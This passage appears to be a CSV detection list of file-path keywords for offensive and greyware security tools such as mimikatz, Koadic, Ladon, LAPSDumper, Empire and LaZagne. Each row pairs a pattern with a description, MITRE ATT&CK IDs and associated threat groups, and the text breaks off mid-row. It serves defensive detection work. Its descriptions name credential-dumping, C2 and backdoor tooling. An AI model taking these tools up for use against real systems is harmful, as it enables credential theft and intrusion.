+"*/KittyStager/*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*/kiwi.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/kiwi_passwords.yar*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/klezVirus/CandyPotato*","offensive_tool_keyword","CandyPotato","CandyPotato - Pure C++ weaponized fully automated implementation of RottenPotatoNG. This tool has been made on top of the original JuicyPotato with the main focus on improving and adding some functionalities which was lacking","T1547.004","TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/CandyPotato","1","1","N/A","N/A","3","289","67","2021-09-16T17:08:52Z","2020-08-21T17:14:30Z" +"*/knqyf263/CVE-2022-0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/knqyf263/CVE-2022-0847","1","1","N/A","N/A","1","46","9","2022-03-08T13:54:08Z","2022-03-08T13:48:55Z" +"*/knx-gateway-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/knx-gateway-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Koadic*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1059.005 - T1059.007 - T1021 - T1547.001 - T1055 - T1012","TA0002 - TA0005 - TA0007 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/zerosum0x0/koadic","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*/koadic.git*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/Koh/*.cs*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","1","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" +"*/KrakenMask.git*","offensive_tool_keyword","KrakenMask","A sleep obfuscation tool is used to encrypt the content of the .text section with RC4 (using SystemFunction032). To achieve this encryption a ROP chain is employed with QueueUserAPC and NtContinue.","T1027 - T1027.002 - T1055 - T1055.011 - T1059 - T1059.003","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/KrakenMask","1","1","N/A","9","2","144","28","2023-08-08T15:21:28Z","2023-08-05T19:24:36Z" +"*/krb5/*.py","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/krb5-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/krbjack.git*","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","1","N/A","10","1","73","13","2023-05-21T15:00:07Z","2023-04-16T10:44:55Z" +"*/KrbRelay*","offensive_tool_keyword","KrbRelay","Relaying 3-headed dogs. More details at https://googleprojectzero.blogspot.com/2021/10/windows-exploitation-tricks-relaying.html and https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html","T1212 - T1558 - T1550","TA0001 - TA0004 -TA0006","N/A","N/A","Exploitation tools","https://github.com/cube0x0/KrbRelay","1","1","N/A","N/A","8","751","109","2022-05-29T09:45:03Z","2022-02-14T08:21:57Z" +"*/krbrelayx*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","1","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"*/KRBUACBypass*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","1","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" +"*/kronos.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/kubesploit.git*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z" +"*/L0ading-x/cve-2022-23131*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tools","https://github.com/L0ading-x/cve-2022-23131","1","1","N/A","N/A","1","23","11","2022-02-22T01:45:34Z","2022-02-22T01:39:52Z" +"*/laconicwolf/burp-extensions*","offensive_tool_keyword","burpsuite","A collection of scripts to extend Burp Suite","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/laconicwolf/burp-extensions","1","1","N/A","N/A","2","136","34","2019-04-08T00:49:45Z","2018-03-23T16:05:01Z" +"*/Ladon.go*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*/Ladon.ps1*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*/Ladon.py*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*/Ladon/Ladon.*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*/Ladon/obj/x86*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*/LadonGo/*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"*/lambda__backdoor_new_roles*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/lambda__backdoor_new_sec_groups*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/lambda__backdoor_new_users*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/LambdaLooter.py*","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","1","64","14","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z" +"*/lanattacks/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/lansearch.exe*","greyware_tool_keyword","advanced port scanner","port scanner tool abused by ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","N/A","Network Exploitation tools","https://www.advanced-port-scanner.com/","1","1","N/A","7","10","N/A","N/A","N/A","N/A" +"*/laps.py *--ldapserver*","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","10","3","222","34","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" +"*/laps.py *-u * -p *","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","10","3","222","34","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" +"*/laps.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/laps_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/LAPSDumper.git*","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","1","N/A","10","3","222","34","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" +"*/lastpass.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*/Lateral/SMB.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*/lateral_movement/*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1052","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/lateral_movement/*.ps1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1092","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/laZagne.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"*/LaZagne/Windows/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - 